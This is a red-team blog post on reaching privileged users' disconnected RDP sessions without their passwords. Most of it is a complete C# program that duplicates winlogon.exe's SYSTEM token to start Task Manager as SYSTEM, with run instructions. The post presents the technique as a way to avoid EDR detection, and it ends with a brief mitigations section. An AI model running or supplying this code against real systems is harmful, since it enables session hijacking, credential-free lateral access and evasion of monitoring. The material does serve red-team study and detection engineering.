Another alternative to LSASS dumping

TL;DR: Dumping credentials from LSASS is not always straightforward when an EDR product is present, and bypassing the EDR is not always straightforward either. As an alternative, a disconnected user session can be entered without knowing that user's password if Task Manager can be launched in SYSTEM context. This post illustrates the Token Duplication technique: the token of a process running as SYSTEM is duplicated and used to start an instance of Task Manager as SYSTEM, from which the victim's disconnected session can be connected to without the user's password.


Background

This post is a continuation of the “Alternative to LSASS dumping” post, which discussed using DLL search-order hijacking to get malware executed in the context of a highly privileged victim user, as an alternative to dumping the memory of LSASS.

On a red team engagement, we observed indicators of highly-privileged users having authenticated against the compromised host after the last reboot.

Therefore, we deemed it likely that their credentials were still cached in the memory of the LSASS process, ripe for dumping, since we had already gained local administrative privileges on the host. However, as we believed the EDR solution present on the host would detect the available dumping techniques, we explored alternatives.

We observed that RDP sessions of highly privileged users had been left disconnected. Without a user's password we could not enter their session from our own account; an instance of Task Manager running in SYSTEM context, however, can connect to another user's disconnected session without being prompted for a password, so that became the goal.

PsExec

We evaluated the viability of using PsExec to create a temporary service running as SYSTEM to instantiate Task Manager in SYSTEM context, but abandoned the idea, as we deemed it likely that service creation was heavily monitored.


Token Duplication

We evaluated the viability of the well-known Token Duplication technique for starting Task Manager in SYSTEM context, decided to proceed with it, and ended up with the C# application linked below.

In brief, the technique works by opening a process that runs in SYSTEM context, e.g. winlogon.exe, duplicating its primary token, and using the duplicate to create a new instance of Task Manager, which therefore also runs as SYSTEM. With Task Manager running as SYSTEM, connecting to a disconnected privileged session is trivial: in the Users tab, right-click the session and choose Connect; no password prompt appears.

A video demonstration of the attack can be seen here: https://www.youtube.com/watch?v=UmwW0fpPBSg

Source code is available at: https://github.com/magnusstubman/tokenduplicator/
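To make the mechanism concrete, the following C# program is an added example written for this edit; it is not the tokenduplicator source linked above. It assumes an elevated (high-integrity) administrator context on Windows, that a winlogon.exe exists in the caller's own session, and that Task Manager lives at C:\Windows\System32\taskmgr.exe; the helper names EnableDebugPrivilege and Fail are the example's own.

```csharp
// TokenDup.cs - added example, not the tokenduplicator source.
// Assumes an elevated administrator context on Windows (SeDebugPrivilege and
// SeImpersonatePrivilege are present but disabled). Build: csc.exe TokenDup.cs
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;

class TokenDup
{
    const uint PROCESS_QUERY_INFORMATION = 0x0400;
    const uint TOKEN_QUERY = 0x0008, TOKEN_DUPLICATE = 0x0002, TOKEN_ADJUST_PRIVILEGES = 0x0020;
    const uint MAXIMUM_ALLOWED = 0x02000000;
    const uint SE_PRIVILEGE_ENABLED = 0x2;
    const uint CREATE_NEW_CONSOLE = 0x10;
    const int ERROR_NOT_ALL_ASSIGNED = 1300;
    const int SecurityImpersonation = 2, TokenPrimary = 1;

    [StructLayout(LayoutKind.Sequential)] struct LUID { public uint LowPart; public int HighPart; }
    // TOKEN_PRIVILEGES with exactly one LUID_AND_ATTRIBUTES entry, flattened.
    [StructLayout(LayoutKind.Sequential)]
    struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr dup);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmdLine, uint flags,
        IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);

    static void Fail(string what) { throw new Win32Exception(Marshal.GetLastWin32Error(), what + " failed"); }

    // Opening a handle to a SYSTEM process such as winlogon.exe requires SeDebugPrivilege.
    // Administrators hold it but it is disabled by default, so enable it in our own token first.
    static void EnableDebugPrivilege()
    {
        IntPtr self;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out self)) Fail("OpenProcessToken(self)");
        var tp = new TOKEN_PRIVILEGES { PrivilegeCount = 1, Attributes = SE_PRIVILEGE_ENABLED };
        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out tp.Luid)) Fail("LookupPrivilegeValue");
        // AdjustTokenPrivileges returns TRUE even when nothing was enabled: check ERROR_NOT_ALL_ASSIGNED,
        // which is what you get from a non-elevated (medium-integrity) administrator shell.
        if (!AdjustTokenPrivileges(self, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero) ||
            Marshal.GetLastWin32Error() == ERROR_NOT_ALL_ASSIGNED)
            Fail("AdjustTokenPrivileges (not running elevated?)");
        CloseHandle(self);
    }

    static void Main()
    {
        EnableDebugPrivilege();

        // One winlogon.exe exists per session. Pick the one in our own session so the
        // duplicated token carries our session ID and Task Manager appears on our desktop.
        int session = Process.GetCurrentProcess().SessionId;
        Process winlogon = Process.GetProcessesByName("winlogon").FirstOrDefault(p => p.SessionId == session);
        if (winlogon == null) throw new InvalidOperationException("no winlogon.exe in session " + session);

        IntPtr hProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, winlogon.Id);
        if (hProc == IntPtr.Zero) Fail("OpenProcess(winlogon)");
        IntPtr hToken;
        if (!OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_QUERY, out hToken)) Fail("OpenProcessToken(winlogon)");

        // Duplicate into a fresh primary token; CreateProcess* functions require a primary token.
        IntPtr hDup;
        if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, IntPtr.Zero, SecurityImpersonation, TokenPrimary, out hDup)) Fail("DuplicateTokenEx");

        // CreateProcessWithTokenW needs SeImpersonatePrivilege, which Administrators hold; CreateProcessAsUser
        // would additionally need SeAssignPrimaryTokenPrivilege, which they do not hold by default.
        var si = new STARTUPINFO { lpDesktop = @"winsta0\default" };
        si.cb = Marshal.SizeOf(typeof(STARTUPINFO));
        PROCESS_INFORMATION pi;
        if (!CreateProcessWithTokenW(hDup, 0, null, @"C:\Windows\System32\taskmgr.exe", CREATE_NEW_CONSOLE,
                                     IntPtr.Zero, null, ref si, out pi)) Fail("CreateProcessWithTokenW");

        Console.WriteLine("taskmgr.exe started as SYSTEM, PID " + pi.dwProcessId);
        CloseHandle(pi.hProcess); CloseHandle(pi.hThread); CloseHandle(hDup); CloseHandle(hToken); CloseHandle(hProc);
    }
}
```

Run it from an elevated prompt; Task Manager opens with SYSTEM shown as its user on the Details tab, and the Users tab then offers Connect on other users' disconnected sessions. Three calls do the work and are the ones worth watching: the handle open on winlogon.exe, DuplicateTokenEx on its token, and CreateProcessWithTokenW with the duplicate.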


Mitigations

Primary mitigations should consist of constraining user privileges so that as few people as possible hold local administrative rights, since the technique requires them. Secondary mitigations should consist of monitoring the sensitive Win32 token APIs the technique relies on (opening a handle to winlogon.exe, duplicating its token and creating a process with it) and alerting on suspicious usage; a Task Manager instance running as SYSTEM inside an interactive user session, or a process-access event against winlogon.exe from an unexpected parent, are both worth an alert. Finally, configure session time limits so that disconnected RDP sessions of privileged users are logged off rather than left sitting on the host waiting to be entered.